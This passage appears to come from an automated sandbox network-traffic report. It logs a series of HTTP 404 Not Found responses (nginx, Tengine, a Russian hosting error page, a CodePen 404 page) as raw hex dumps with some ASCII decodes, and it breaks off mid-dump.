          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 10:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 10:58:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 10:58:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 10:59:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 10:59:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 10:59:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 10:59:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:59:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:59:33 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:59:35 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:59:38 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 